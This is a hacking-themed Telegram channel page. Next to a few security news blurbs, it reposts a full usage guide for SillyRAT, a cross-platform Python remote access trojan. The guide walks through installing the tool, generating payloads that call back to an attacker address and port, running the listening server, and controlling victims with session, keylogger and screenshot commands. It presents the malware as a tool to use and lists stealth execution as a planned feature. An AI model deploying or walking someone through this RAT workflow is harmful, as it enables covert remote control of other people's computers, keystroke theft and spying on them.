Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Dark Reading: Attacks/Breaches
Why Is Cyber Assessment So Important in Security?

All the pen testing and tabletop exercises in the world won't help unless an organization has a complete and accurate understanding of its assets.
Dark Reading: Attacks/Breaches
New Cyberattack Campaign Uses Public Cloud Infrastructure to Spread RATs

An attack campaign detected in October delivers variants of Nanocore, Netwire, and AsyncRATs to target user data.
PHP Type Juggling

PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
SillyRAT : A Cross Platform Multifunctional (Windows/Linux/Mac) RAT

SillyRAT is a cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.

Features

* Built-in Shell for command execution
* Dumping System Information including drives and rams
* Screenshot module. Captures screenshot of client screen.
* Connection Loop (Will continue on connecting to server)
* Currently, it uses BASE64 encoding.
* Pure Python
* Cross Platform. (Tested on Linux. Errors are accepted)
* Source File included for testing
* Python 3

To be expected in future

* Stealth Execution
* Encryption
* Storing Sessions from last attempt
* Pushing Notifications when a client connects

Installation

The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:

$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt

Documentation

Generating Payload

You can get the payload file in two ways:

* Source File
* Compiled File

The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:

$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/payload.py –source

The compiled version has to generated on the respective platform. For example, you can’t generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:

$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/filer
https://blogger.googleusercontent.com/img/a/AVvXsEiiP2rvzroiFqVPQF7nWfOPFi6UtI8H9OHIp0lo6YikdUKty-79fwFmkRDHYPpZShCdOmz1Hwbm_dGu6HRfSbEjOwaanhRrbzYJuIO-5b9RYAlE9dL6IKLAmgWG9wNR1wSLE25a_mCq_OfbDHu6_5Y3NijJ6fXYOIb6EfFcc0Eh41Nq2W3e7bLE3Hvs=s1882
Replace your IP Address and Port on above commands.

Running Server

The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn’t store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:

$ python3 sillyrat.py bind –address 0.0.0.0 –port 2999

Connections

All the connections will be listed under sessions command:

$ sessions
https://blogger.googleusercontent.com/img/a/AVvXsEjHaNcteXtCI1tPmYXHv11PvTg9RZJV7YOiX95Yid-ay4lTP_XyZIbmVM3NOgoaNUYCcOwuF8BXE8YYO_jNqRJ0M2LFpMSkLY9SrrkPcQG3sRppy-DTdunWwZpfNhWk61MLSIEAhGmtdUZBlV4SioruK2pC0IBY__jPRXSgWetxC9upn1O8WNCXU7VY=s1882
You can connect to you target session with connect command and launch one of available commands:

$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot
https://blogger.googleusercontent.com/img/a/AVvXsEh3qze1H8xzlDogM1Ppjh5p79QIBDuBffor6UpS4HsN9d9NFMhriOiS02-gWFpVt2bVIECfLUR8Jx4UJj6pIMIv7MjoxlIxamrEWNFCOG1mK2nEuPVZoM2lDXqNFUK1qAgHgjWRM-S8Ozj3mSGwrZhTLbQPDbk0WRWKctik7gXHVeSGOInpSeaosRhR=s1882
Help

Get a list of available commands:

$ help

Help on a Specific Command:

$ help COMMAND
Download

___________________________
@hacking_Attack
@Hacking_Video